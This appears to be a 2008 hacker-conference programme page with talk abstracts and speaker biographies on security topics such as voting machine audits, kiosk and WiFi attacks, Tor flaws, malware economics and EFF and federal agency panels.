Hanging Chads, Hopping votes, Flipped votes, Tripled votes, Missing memory cards, Machine malfunctions, Software glitches, Undervotes, Overvotes. Reports of voting machine failures flooded the news after the last elections and left most voters wondering "Does my vote really count?" "Can these electronic voting machines be trusted?" "How secure are my state's voting systems?"

In December 2007, we published an in depth, source code and hardware analysis of all the voting systems used by the state of Ohio, funded by the Ohio Secretary of State. Come find out what we learned, and draw your own conclusions.

Sandy Clark, "Mouse" has been taking things apart since the age of two, and still hasn't learned to put them back together. Luckily, in the University of Pennsylvania's Distributed Systems Lab, this behavior is actively encouraged. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game, not the person) and infrastructure hacking. Her research explores human scale security and the unexpected ways that systems interact.

Top of page

Could Googling Take Down a President, a Prime Minister, or an Average Citizen?


Greg Conti
United States Military Academy

Every time we use the web, we disclosure tremendous amounts of information to ISPs, Internet backbone providers, and online companies; information that will be shared and data mined, but rarely discarded. Email addresses, phone numbers, aggregated search queries, cookies, IP addresses - any unique feature of our behavior provides a mechanism to link, profile, and identify users, groups, and companies. From these revelations all aspects of our daily lives emerge, including our activities, locations, and social networks. Making matters worse, ubiquitous advertising networks, dominant online companies, complicit network providers, and popular web analytic services possess the ability to track, and in some cases, eavesdrop on and modify our online communications.

The AOL dataset debacle and subsequent public outrage illustrated one facet of the problem - Search. This talk covers all aspects of the problem, including end user computers, network providers, online companies, and advertising networks. It also includes countermeasures to help protect your personal and organizational privacy. It is important to note that the research presented is the inverse of Google Hacking, which strives to retrieve sensitive information from the databases of search engines. This talk instead focuses on what information online companies can pull from you, as well as what network providers can see and modify. The long-term implications of web-based information disclosure are profound. Interaction by interaction we are ceding power to ISPs and online companies, disclosures which may one day alter the course of elections, remove world leaders from power, or cause the outspoken citizen to disappear from the web.

Greg Conti is an Assistant Professor of Computer Science at the United States Military Academy, West Point, NY. His research includes security data visualization and web-based information disclosure. He is the author of Security Data Visualization (No Starch Press) and the forthcoming Googling Security (Addison-Wesley). His work can be found at www.gregconti.com and www.rumint.org.

Top of page

Compromising Windows Based Internet Kiosks


Paul Craig
Principal Security Consultant, Security-Assessment.com

Internet Kiosks have become common place in today's Internet centric society. Public Internet Kiosks can be found everywhere, from Airports, Train stations, Libraries and Hotels to corporate lobbies and street corners. Kiosks are used by thousands of users daily from all different walks of life, creed, and social status.

Internet kiosk terminals often implement custom browser software which rely on proprietary security mechanisms and access controls. Kiosks are designed to limit the level of access a user has to the Internet kiosk, and attempt to thwart malicious activity. Kiosk users are prohibited from accessing the Kiosk's local file system, or the surrounding local network attached to the Kiosk. The only guaranteed functionality is a "secured" web-browser. For a service so common-place, there has been practically zero research regarding the security of Internet Kiosk software. This talk will cover Internet Kiosk software exploitation techniques, and demonstrate multiple methods of compromising Windows based Internet Kiosk terminals.

Paul Craig is a principal security consultant at Security-Assessment.com based in Auckland New Zealand. Paul is a kiwi hacker with a passion for breaking technology whenever possible. Its highly suggested to buy Paul a beer whenever possible.

Top of page

Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key


Thomas d'Otreppe de Bouvette "Mister_X"

Rick Farina "Zero_Chaos"

In this talk we will discuss the paradigm shift of WiFi attacks away from the Access Points and focusing toward the clients. We will cover in depth how simple tricks such as HoneyPot Access Points or even hotspotter simply are not enough anymore and more flexible and powerful methods are being developed and used. The older, dated technologies built into Access Points for ensuring network security have failed the test of time paving way for new overlay security vendors to begin selling "Wireless Intrusion Detection and Prevention Systems" to fill the gap left by the Access Point manufacturers and the ieee802.11 committee.

We will explore a variety of feature of these devices, and see what claims stack up and which ones do not. Finally, we will explore a new frontier for WiFi networks, licensed frequencies. Many vendors currently ship ieee 802.11 compliant devices that operate on non-public bands. We will explore what types of things you can find with some simple driver modifications and why the current generation of tools needs to improve to play by these new rules. If you want to learn about what wireless hacking will look like in the coming year, instead of just cracking wep, you can't afford to miss this talk.

Thomas d'Otreppe is the creator of Aircrack-ng and also designed the WiFu course (Offensive-security) with Mati Aharoni.

Rick Farina is a member of the aircrack-ng team and has been working with wireless security for 8 years. In the past Rick has been involved in low-level network hacking such as ettercap and generally enjoys hanging out at layer 2.

Top of page

Hacking Data Retention: Small Sister your digital privacy self defense


Brenno De Winter
J.S.A.A.F., De Winter Information Solutions

Over the last couple of years a range of privacy threats have been in occurring. Europe is starting to look like the playing field of what is to come to the US: Storage of all e-mail traffic, online presence, phone calls, actual traveling throughout nations and filtering of content. Fortunately a closer look at the measures shows that it is never smart to overestimate the abilities European governments have and digital self defense is possible. But since we don't want to underestimate the threat as well. So that's why we look how these measures effects can be greatly reduced and how we can have fun online again. This knowledge is something we probably want to extend to many people to help them reclaim their digital rights with the use of simple and existing technologies. The Small Sister Project shows you how to do that and delivers the tools to make that easier. Learn how simple measures can make a huge difference.

Brenno De Winter started experimenting with security at the age of 9. He has a background in open source that dates back to 1993 and he contributed to several projects like MySQL, GnuPG, Gnucomo (Gnu Computer Monitoring) and recently started the Small Sister-project for privacy-friendly internet usage. In his daily job he practices security,teaches it and works as an IT-journalist. His writings have triggered several debates in parliament and often raises questions. ///

Top of page

Security and anonymity vulnerabilities in Tor: past, present, and future


Roger Dingledine
Project leader, The Tor Project

There have been a number of exciting bugs and design flaws in Tor over the years, with effects ranging from complete anonymity compromise to remote code execution. Some of them are our fault, and some are the fault of components (libraries, browsers, operating systems) that we trusted. Further, the academic research community has been coming up with increasingly esoteric --- and increasingly effective! --- attacks against all anonymity designs, including Tor.

Roger will walk through some of the most egregious bugs and design flaws we've had, and give some intuition about lessons learned building and deploying the largest distributed anonymity network ever. Then he'll outline the wide variety of current vulnerabilities we have, explain what they mean for our users, and talk about which ones we have a plan for and which ones will continue to be a pain for the coming years. Last, we'll speculate about categories and topics that are likely to introduce new problems in the future.

Roger Dingledine is project leader for The Tor Project. The Tor network has grown to over 1500 relays handling traffic for hundreds of thousands of users daily. In the past few years The Tor Project has also gotten an increasingly diverse set of funders, become an official 501c3 nonprofit, and expanded its community of both volunteer and funded developers.

In addition to all the hats he wears for Tor, Roger organizes academic conferences on anonymity and security, speaks at industry and hacker cons, and does tutorials on anonymity for national and foreign law enforcement.

Top of page

Next Generation Collaborative Reversing with Ida Pro and CollabREate


Chris Eagle
Associate Chairman of the Computer Science Dept, Naval Postgraduate School (NPS)
Tim Vidas
Research Associate, Naval Postgraduate School (NPS)



A major drawback with the use of most reverse engineering tools is that they were not designed with collaboration in mind. Numerous kludgy solutions exist from asynchronous use of the same data files to working on multiple copies of data files which quickly diverge leaving the differences to somehow be reconciled. Pedram Amini's Ida Sync provided a first step towards automated collaboration among Ida users however Ida Sync suffers from several shortcomings including the fact that it has failed to keep pace with the evolution of Ida's internal architecture. In this presentation, the authors present a new tool titled collabREate designed to bring nearly effortless collaboration to Ida users. The talk will include discussion of the IDA API and the ways in which it facilitates collaboration along with the ways in which it hinders collaboration. The design of a robust server component, responsible for managing projects and connected clients will also be discussed along with a number of capabilities beyond simple collaboration that are enabled via the collabREate architecture..

Chris Eagle is the Associate Chairman of the Computer Science Department at the Naval Postgraduate School (NPS) in Monterey, CA. A computer engineer/scientist for 23+ years, his research interests include computer network operations, computer forensics and reverse/anti-reverse engineering. He has been a speaker at conferences such as Black Hat, Toorcon, CodeCon, and Shmoocon and is the author of the upcoming "The IDA Pro Book". In his spare time he heads up the Sk3wl of r00t CTF team and can be found pulling all-nighters at Defcon.

Tim Vidas is a Research Associate in the Computer Science Department at the Naval Postgraduate School (NPS). His current primary research focuses around high assurance trusted computing, but interest also strays to digital forensics, reverse engineering, and the like. He maintains several academic affiliations and has previously spoken at conferences such as Shmoocon, CanSecWest, DC3 and HTCIA. In his free time he toys around with digital forensics competitions, CTF exercises, and any other interesting look challenges.

Top of page

Markets for Malware: A Structural Economic Approach


Brian K. Edwards
Economist, Los Alamos National Laboratory
Silvio J. Flaim
Economist, Los Alamos National Laboratory

Much literature has addressed the issue of the relative sizes of shadow economies in different countries. What is largely missing from this discussion is a more structured discussion on how to incorporate estimates of shadow economic activity into the national income accounting framework and a discussion of how the shadow components of specific industries can be analyzed in either an input-output or macroeconomic framework. After a brief discussion of existing estimates of black market activity, we discuss how black market activities might be measured and incorporated in standard economic models of the economy. We then focus particular attention on the malware industry and discuss how malware activity influences other economic activity (both official and shadow) and discuss possible methods of how malware activity can be estimated, and how the contribution of malware to overall economic activity can be measured. Finally, we discuss how the methods used to integrate malware economic activity into the national income accounts can be applied to other sectors of the economy, and hence how to develop an alternative measure of the size of the shadow economy. With a new baseline incorporating these "shadow" activities, the economic model is used to examine questions such as: What is the net economic contribution of malware and other shadow economic activity? What would be economic impact of eliminating malware and other shadow activity in all its forms?

Brian K. Edwards received his Ph.D. in economics from the University of California, San Diego, in 1984 and has over twenty years of experience in economic modeling, econometrics, macroeconomic and regional economic modeling, forecasting, and in energy, environmental, and natural resource economics. He has published numerous reports, academic publications, and recently authored a book The Economics of Hydroelectric Power (2003). He is currently the Team Lead of the Socio-Economics Network Team of the Decision Analysis Division of Los Alamos National Laboratory. He has also economist positions at the National Marine Fisheries Service, U.S. Government Accountability Office, Argonne National Laboratory, LECG, and RCF Economic and Financial Consulting. He also has a private consulting practice, Brian K. Edwards Associates.

Top of page

Panel: All Your Sploits (and Servers) Are Belong To Us:


Vulnerabilities Don't Matter (And Neither Does Your Security)


David Mortman
CSO in Residence, Echelon One
Rich Mogull
Securosis
Chris Hoff
Unisys
Robert "RSnake" Hansen
CTO, SecTheory
Robert Graham
CTO, Errata Security
David Maynor
CTO, Errata Security

Think that latest buffer overflow or XSS exploit matters? It doesn't. Think your network is secure because you have the latest and greatest IPS? It isn't. The truth is all exploits or defenses on their own are worthless; it's how you use your tools and respond to incidents that really matters. This panel, composed of top vulnerability and security researchers, will roll through a rapid-fire series of demonstrations as they smash through the security of popular consumer and enterprise devices and systems, often using simple techniques rather than the latest 0day exploits (but we'll see a few of those too). They'll then debate the value of any single attack vector or defense, and show how it's the practical application of attacks, defenses, and (more importantly) responses that really matters. From iPhones to browsers to SCADA, it isn't your advanced attack or defensive tool that matters, it's what you do with it.

As CSO-in-Residence, David Mortman is responsible for Echelon One's research and analysis program. Formerly the Chief Information Security Officer for Siebel Systems, Inc., David and his team were responsible for Siebel's worldwide IT security infrastructure, both internal and external. He also worked closely with Siebel's product groups and the company's physical security team and is leading up Siebel's product security and privacy efforts. Previously, Mr. Mortman was Manager of IT Security at Network Associates, where, in addition to managing data security, he deployed and tested all of NAI's security products before they were released to customers. Before that, Mortman was a Security Engineer for Swiss Bank. A CISSP, member of USENIX/SAGE and ISSA, and an invited speaker at RSA 2002 and 2005 security conferences, Mr. Mortman has also been a panelist and speaker at RSA 2007, InfoSecurity 2003, Blackhat 2004, 2005, 2006 and 2007, Defcon 2005, 2006 and 2007 and Information Security Decisions 2007 as well. Mr. Mortman sits on a variety of advisory boards including Qualys, Applied Identity and Reflective amongst others. He holds a BS in Chemistry from the University of Chicago.

Robert "RSnake" Hansen (CISSP) is the Chief Executive Officer of SecTheory. SecTheory is a web application and network security consulting firm. Robert has been working with web application security since the mid 90's, beginning his career in banner click fraud detection at ValueClick. Robert has worked for Cable & Wireless heading up managed security services, and at eBay as Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-cross-site scripting, and anti virus strategies. Robert also sits on the technical advisory board of ClickForensics and contributes to the security strategy of several startup companies. Robert is best known for founding the web application security lab at ha.ckers.org and co-authoring XSS Exploits and Defense. Robert is a member of WASC, IACSP, and ISSA, and contributed to the OWASP 2.0 guide.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WW-II codebreaker. His first IDS was written more than 10 years ago designed to catch Morris-worm copycats. He is the author of several pending patents in the IDS field. He is the author of well-regarded security-related documents and is a frequent speaker at conferences. Previously he was the chief scientists of Internet Security Systems. Before that he was the co-founder, CTO, and chief-architect of Network ICE which was acquired by Internet Security Systems.

David Maynor is a founder of Errata Security and serves as the Chief Technical Officer. Mr. Maynor is responsible for day-to-day technical decisions of Errata Security and also employs a strong background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor has previously been the Senior Researcher for Secureworks and a research engineer with the ISS Xforce R&D team where his primary responsibilities included reverse engineering high risk applications, researching new evasion techniques for security tools, and researching new threats before they become widespread. Before ISS Maynor spent the 3 years at Georgia Institute of Technology (GaTech), with the last two years as a part of the information security group as an application developer to help make the sheer size and magnitude of security incidents on campus manageable.

Top of page

Panel: Black vs. White: The complete life cycle of a real world breach


David Kennedy
Practice Lead: Profiling & e.Discovery, SecureState
Ken Stasiak
President & CEO, SecureState
Scott White
Senior Security Consultant, SecureState
John Melvin
Senior Security Consultant, SecureState
Andrew Weidenhamer
Staff Security Consultant, SecureState

Black vs. White: The complete life cycle of a real world breach combines a unique idea and a real-world case study from a client of ours that details the start of a hack to the identification, forensics, and reversing. We will be discussing some advanced penetration techniques and reversing topics. Starting off, we will be performing a full system compromise from the internet (complete with live demos), installing some undetectable viruses, and having a separate team reverse it, and show you what its doing and how it works. This is the ultimate battle of evil verses good.

Additionally, what would a con be without some awesome tool releases? We will be releasing (and demoing) two tools, one a Windows GUI for the windows folks that does everything for SQL injection rooting, minus making you breakfast, one Linux based tool that auto crawls a site and performs blind/error based SQL injection with reverse command shells using various options for payload delivery.

David Kennedy CISSP, GSEC, MCSE 2003, is the practice lead for the profiling and e.Discovery group at SecureState, a Cleveland Ohio based security consulting company. David has been in the security field for over eight years. David has released tools in the past, including the popular python based tool called Fast-Track, included in Back|Track 3. David is also a contributor to the Back|Track suite. David runs a team of highly skilled security individuals that perform penetration tests on large to mid-sized businesses. Some of our clients include top ten banks, fortune 500/1000 companies, and multi-billion dollar organizations. Prior to SecureState, David worked for the National Security Agency (N.S.A.) working in a specialized security group as an active duty Marine. David has developed several systems for the DoD relating to security and are still being used to-date. David has presented at several speaking engagements including the international INFOSEC summit, the international HTCIA, and various other large-scale forums.

Ken Stasiak CISSP, CISA, GSEC, CISM, QSA, is the president and CEO of SecureState and has been involved in security for over fourteen years. Ken originally began his security career at Ernst & Young where he had the privilege of working with extremely talented people including Jeff Moss, and the original founders of Foundstone. After E&Y, he moved to Arthur Anderson where he headed up an entire regional security group for the organization. Ken started SecureState a week after September 11th, 2001 to create an elite dedicated security company that was known throughout the world.

Scott White is SecureState's lead web application security penetration tester. Scott is heavily involved with the OWASP, running the Cleveland, Ohio OWASP chapter. He has been instrumental in securing web applications for companies all over the country.

Andrew Weidenhamer is SecureState's lead penetration tester and has been involved in security tool development in the community as well as performing large scale penetration efforts on numerous organizations. Andrew first started his security career at Key Bank, handling bank level security. Quickly desiring a more robust and fast-paced environment, Andrew joined SecureState and quickly became their lead penetration tester.

John Melvin CISSP, GSEC, is SecureState's lead forensics investigator and handles all incident response, reverse engineering, and virus development at SecureState. John's mission is to respond and handle breaches to organizations and identify how, when, and why they occurred. Prior to SecureState, John worked for several highly classified programs, specifically pertaining to reverse malware/virus anomaly detection.

Top of page

Panel: Ask EFF: The Year in Digital Civil Liberties Panel


Kevin Bankston
Senior Staff Attorney, EFF
Eva Galperin
Referral Coordinator, EFF
Jennifer Granick
Civil Liberties Director, EFF
Marcia Hofmann
Staff Attorney, EFF
Corynne McSherry
Staff Attorney, EFF
Kurt Opsahl
Senior Staff Attorney, EFF

Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation's premiere digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as NSA wiretapping and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, highlighting our open government efforts with documents obtained through the Freedom of Information Act on government surveillance efforts, introducing the Coder's Rights Project, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.

Kevin Bankston an EFF Senior Staff Attorney specializing in free speech and privacy law, was EFF's Equal Justice Works/Bruce J. Ennis Fellow for 2003-05. His fellowship project focused on the impact of post-9/11 anti-terrorism laws and surveillance initiatives on online privacy and free expression. Before joining EFF, Kevin was the Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union in New York City. At the ACLU, Kevin litigated Internet-related free speech cases, including First Amendment challenges to both the Digital Millennium Copyright Act (Edelman v. N2H2, Inc.) and a federal statute regulating Internet speech in public libraries (American Library Association v. U.S.). Kevin received his J.D. in 2001 from the University of Southern California Law Center, and received his undergraduate degree from the University of Texas in Austin.

Eva Galperin As the referral coordinator, Eva is usually the first person to encounter a request for legal assistance when it is brought to EFF. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills. Her interests include aerials, rock climbing, opera, and not being paged at 3 o'clock in the morning because the mail server is down. This is her first DEFCON since 2001.

Jennifer Granick is the Civil Liberties Director at the Electronic Frontier Foundation. Before EFF, Granick was a Lecturer in Law and Executive Director of the Center for Internet and Society at Stanford Law School where she taught Cyberlaw and Computer Crime Law. She practices in the full spectrum of Internet law issues including computer crime and security, national security, constitutional rights, and electronic surveillance, areas in which her expertise is recognized nationally. Before teaching at Stanford, Jennifer spent almost a decade practicing criminal defense law in California. She was selected by Information Security magazine in 2003 as one of 20 "Women of Vision" in the computer security field. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of the University of South Florida.

Marcia Hofmann is an EFF Staff Attorney focusing on government transparency and civil liberties issues. Along with her colleague David Sobel, she established EFF's FOIA Litigation for Accountable Government (FLAG) Project. Prior to joining EFF, Marcia was Director of the Open Government Project at the Electronic Privacy Information Center (EPIC), where she spearheaded EPIC's efforts to learn about emerging policies in the post-9/11 era and was lead counsel in several Freedom of Information Act (FOIA) lawsuits. Documents made public though her work have been reported by the New York Times, Washington Post, National Public Radio, Fox News, and CNN, among others. She is a graduate of the University of Dayton School of Law and Mount Holyoke College.

Corynne McSherry is a Staff Attorney at EFF, specializing in intellectual property and free speech litigation. Representative cases include: Lenz v. Universal (copyright misuse), MoveOn.org et al. v. Viacom International (copyright misuse), Ricciuti et al v. Sony BMG (class action based on music label's use of DRM that introduced security flaws into users' computers), as well as numerous amicus briefs on trademark, copyright and patent issues. Prior to joining EFF, Corynne was a civil litigator at the law firm of Bingham McCutchen, LLP. Corynne holds a Ph.D from the University of California at San Diego, and a J.D. from Stanford Law School. While in law school, Corynne published Who Owns Academic Work?: Battling for Control of Intellectual Property (Harvard University Press, 2001).

Kurt Opsahl is a Senior Staff Attorney with the Electronic Frontier Foundation focusing on civil liberties, free speech and privacy law. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal, which established the reporter's privilege for online journalists.

Top of page

Panel: Hacking in the Name of Science


Tadayoshi Kohno
Assistant Professor, University of Washington
Jon Callas
Chief Technology Officer, PGP Corporation
Alexei Czeskis
PhD Student, University of Washington
Dan Halperin
PhD Student, University of Washington
Karl Koscher
PhD Student, University of Washington
Michael Piatek
PhD Student, University of Washington

Our talk will start with some of our latest and greatest hacks. In 2003 we were the first to analyze the security of Diebold's AccuVote-TS voting machine software. We'll discuss the inside scoop on how we got the code, broke it, and then went public. In 2008 we also published the first attacks against a real, common wireless implantable medical device – an implantable defibrillator and pacemaker – and we did so using off-the-shelf software radios. What else will we talk about? Well, there was our research in measuring just how frequently ISPs are injecting ads into people's web pages, our framing of network printers for copyright infringement (and receiving DMCA takedown notices to those printers), our invention of clock skew-based remote physical device fingerprinting, and much more.

Are we hackers? No, we're scientists at a leading public university. So what turns hacking into "science" when it's done by academics? We'll answer these and other questions in the second half of the talk, which is geared to give you an inside glimpse into the world of academic security research. Along the way we'll answer questions like: How do we choose which technologies to hack – or as we say – "analyze," "study," and "investigate?" What might we hack next? What can we do as academic researchers in public institutions that industry researchers can't? What ethical and legal issues do we need to consider? And why is what we do considered "science?"

Anyone who doesn't want their product to be the next technology hacked (sorry, "studied") by academics like us should definitely attend this talk. And, of course, come to this talk if you're considering grad school in computer security. We'll also debate how academics and industry security researchers could better work together. Here we'd particularly like your feedback. What can academics learn from you? What do you think we could do better? What would you like us to look at next?

(Standard academic disclaimer: Many of the works will discuss were previously published in conjunction with other researchers. We'll acknowledge all relevant parties in the talk.)

Tadayoshi (Yoshi) Kohno is an Assistant Professor of Computer Science and Engineering at the University of Washington. He worked as a cryptography and computer security consultant with Bruce Schneier, back when Counterpane Systems had less than a handful of full-time cryptographers and before the days of Counterpane Internet Securities, Inc. Since then he's conducted published security analyses of technologies as varied as: electronic voting machines, implantable wireless defibrillators, file encryption systems, popular consumer devices, and ISP ad injectors. Kohno has a Ph.D. in Computer Science (cryptography) from the University of California at San Diego.

Jon Callas served as Chief Scientist at PGP Inc. and as CTO of the Network Security Division for Network Associates Technologies Inc. Mr. Callas served as Director of Software Engineering at Counterpane Internet Security Inc. and was a co-architect of Counterpane's Managed Security Monitoring system. Most recently, he was Senior Systems Architect at Wave Systems Corporation. His career includes work at Digital Equipment Corporation, World Benders, and Apple Computer. He is the principal author of the Internet Engineering Task Force's (IETF's) OpenPGP standard and a writer and frequent lecturer on system security and intellectual property issues. Mr. Callas has a B.S. in Mathematics from the University of Maryland.

Alexei Czeskis is a graduate student in the Computer Science and Engineering department of the University of Washington, where he hacks, or more benignly -- performs research, under Professor Yoshi Kohno. Formerly, he was a part of CERIAS -- Center for Education and Research in Information Assurance and Security at Purdue University. Alexei has also spent time in industry working with Amazon.com's transaction risk management group.

Dan Halperin is a PhD student in computer science and engineering at the University of Washington. His research includes wireless networking, with a current focus on next-generation technologies, and practical security and privacy in the wired and wireless, digital and physical domains. He received his BS in computer science and mathematics from Harvey Mudd College and his MS at Washington. He likes to make and break things in his spare time, and on the side helps teach lock picking to Washington undergraduates and is an avid participant in urban spelunking. In addition to memberships in dry academic communities, Daniel is a member of the EFF.

Karl Koscher is a computer science PhD student at the University of Washington. While interested in a wide variety of security topics, the bulk of his work has focused on the privacy and security issues surrounding RFID and other ubiquitous technologies. He is informally known around the department as "big brother."

Michael Piatek is a PhD at the University of Washington. After spending his undergraduate years working on differential geometry, his research interests now include incentive design in distributed systems, network measurement, and large-scale systems building.

Top of page

Panel: Internet Wars 2008


Gadi Evron
Moderator

Some of the panel members in previous years:

Andrew Fried IRS
Thomas Grasso FBI
Dan Hubbard Websense
Dan Kaminsky IOActive
Randy Vaughn Baylor
Paul Vixie ISC

This year's panel members will be announced closer to the conference date.

Continuing our new tradition from the past two years, leading experts from different industries, academia and law enforcement will go on stage and participate in this panel, discussing the current threats on and to the Internet, from regular cyber-crime all the way to the mafia, and even some information warfare.

In this panel session we will begin with a short (2-5 minutes) introductory presentation from Gadi Evron on the latest technologies and operations by the Bad Guys and the Good Guys. What's going on with Internet operations, global routing, botnets, extortion, phishing and the annual revenue the mafia is getting from it. The members will accept questions on any subject related to the topic at hand, and discuss it openly in regard to what's being done and what we can expect in the future, both from the Bad Guys and the Good Guys.

Discussion is to be limited to issues happening on the Internet, rather than this or that vulnerability. The discussion is mostly technological and operational in nature, although for example two years ago attendees chose to ask questions directing the discussion to the legal side of things. Participants are people who are involved with battling cyber-crime daily, and are some of the leaders in the security operations community of the Internet.

Gadi Evron is recognized globally for his work and leadership in Internet security operations. He is the founder of the Zeroday Emergency Response Team (ZERT), organizes and chairs worldwide conferences, working groups and task forces. He is considered an expert on corporate security and counterespionage, botnets, e-fraud and phishing. Previously, Gadi was CISO at the Israeli government ISP (eGovernment project) and founded the Israeli Government CERT. Gadi authored two books on information security and is a frequent lecturer.

Top of page

Panel: Meet the Feds 2008


Jim Christy
DC3
Mike Convertino
AFCC
Cynthia Cuddihy
RCMP
James Finch
FBI
Barry Grundy
NASA
David Helfen
NCIS
Bob Hopper
NW3C
Ray Kessenich
DCITA
Tim Kosiba
NSA
Mischel Kwon
USCERT
Rich Marshall
NSA
Marc Moreau
RCMP
Tom Pownall
RCMP
Ken Privette
USPS IG
Lin Wells
NDU

Ever had to sweat through an interrogation or watch some poor sap suffer a similar fate? Have you ever wanted to turn the tables and put those cruel individuals responsible on the chopping block? Well, now you can! With representatives from NSA, NASA, FBI, IRS, DHS, and other fine Federal agencies, you will have an abundance of opportunities to attempt to humiliate, harass, threaten, or even bring them to tears. Go ahead hack away and take your best shot! Remember, what is said on this panel in Vegas, stays on this panel in Vegas...

Again this year we will have many federal agencies -

Information Assurance Panel: CERTS, first responder's organizations from agencies including DC3, DHS USCERT, NSA, OSD, and NDU

Law Enforcement Counterintelligence Panel: including DC3, FBI, IRS, NCIS, NASA, NWC3, US Postal IG

Each of the agency reps make an opening statement regarding their agencies role, then open it up to the audience for questions.

Agencies that will have representatives include: Defense Cyber Crime Center (DC3), FBI, IRS, NCIS, NASA, DHS USCERT, DoJ, National White Collar Crime Center (NWC3), NSA, US Postal IG, Office of the Secretary of Defense, National Defense University.

For years Defcon participants have played "Spot the Fed." For the 3rd year, the feds will play "Spot the Lamer". Come out and nominate a Lamer and watch the feds burn'em.

Jim Christy, FX/DC3
* Dir of Futures Exploration
* Dir the Defense Cyber Crime Institute
* R&D of digital forensic tools and processes
* T&Validation of tools both Hardware & software used in an accredited digital forensics lab
* Dir of Ops for Defense Computer Forensics Lab
* LE/CI Liaison to OSD IA
* DoD Rep to President's Infrastructure Protection Task Force
* US Senate Investigator ­ Perm Sub of Invest
* 11 years Dir of AF OSI Computer Crime Investigations


Jerry Dixon, DHS
As Director of National Cyber Security Division (NCSD) of the Department of Homeland Security, Jerry Dixon leads the national effort to protect America's cyber infrastructure and identify cyber threats. He works collaboratively and facilitates strategic partnerships with stakeholders in the public sector, private industry, and the international arena. Mr. Dixon was appointed Director of the NCSD on January 7, 2006.

Prior to being chosen to lead NCSD, Mr. Dixon served as the Deputy Director of Operations for the U.S. Computer Emergency Readiness Team (US-CERT), where he was responsible for coordinating incident response activities across federal, state, local government agencies, and private sector organizations. Mr. Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. Mr. Dixon led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, local government agencies, and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.

Before joining NCSD, Mr. Dixon was the founding director of the Internal Revenue Service's (IRS) Computer Security Incident Response Capability. In this role, Mr. Dixon led their operational cyber security capability for the IRS and developed their ability to detect and respond to protect American taxpayer's private information from security attacks. Mr. Dixon has also served as Director of Information Security for Marriott International, a global private sector company, where he led cyber security planning, security architecture, and security operations.


Tim Fowler, NCIS
Tim is an active duty Marine Special Agent who has worked as a Cyber Agent for the NCIS Cyber Department in Washington, DC, for the last six years. Tim has 19 years of active duty service in the U.S. Marine Corps working in the fields of military police, polygraph, criminal investigations and computer crime investigations and operations. While working as a Cyber Agent for NCIS, Tim specializes in conducting criminal, counterintelligence and counter-terrorism computer crime investigations and operations. Tim also has extensive knowledge and experience conducting media exploitation operations in hostile environments. In 2004, Tim was awarded the Bronze Star with combat Valor device by the Secretary of the Navy for his media exploitation efforts in Iraq.


Barry J. Grundy, NASA
Barry J. Grundy has worked as a Special Agent for the NASA Office of Inspector General (OIG), Computer Crimes Division (CCD) for the past six years. In that time he has been responsible for conducting computer intrusion investigations related to NASA systems. In 2005, SA Grundy received the annual Inspector General's award for his investigative efforts. He currently serves as the Resident Agent in Charge of the Eastern Region of the NASA OIG CCD, responsible for the supervision of criminal investigations related to cyber events at eight NASA Centers. Before working for the NASA OIG, SA Grundy was employed as a Special Agent for the Ohio Attorney General's Office, Health Care Fraud Unit, where he was responsible for the computer seizure and forensic media analysis support for the unit in addition to maintaining a normal health care fraud case load.

Prior to his law enforcement career, Grundy served for six years in the United States Marine Corps. All of his active duty service was spent in Reconnaissance Battalions, eventually as a Recon Team Leader, Scout/Sniper, and Combat Diver.

SA Grundy currently lives in Maryland with his wife, Jo Ann and son, Patrick. Hobbies include motorcycles, computers, and outdoor activities.


Andrew Fried, IRS
Andrew Fried is a Senior Special Agent with the Treasury Inspector General for Tax Administration's System Intrusion and Network Attach Response Team (SINART). His organization is responsible for investigating computer security incidents involving the Internal Revenue Service.

During his 17 year career with Treasury, he is credited with developing his agency's Computer Investigative Specialist (CIS) program, whose members are responsible for analyzing seized computers, as well as the SINART program, whose mission is to investigate computer intrusions and conduct pro-active network penetration testing.

In 1986, while working at the Kennedy Space Center, he developed one of the first suites of software programs specifically designed for analyzing seized computers. His software was distributed, free of charge, to law enforcement agencies throughout the world.


Bob Hopper, NW3C Mr. Hopper manages NW3C Computer Crimes instructor cadre who provide computer forensics training to state and local Law Enforcement throughout the United States. The Computer Crimes Section offers basic, intermediate and advance training in computer forensics and computer crimes as well as provides technical assistance and research and development for computer forensic examiners.

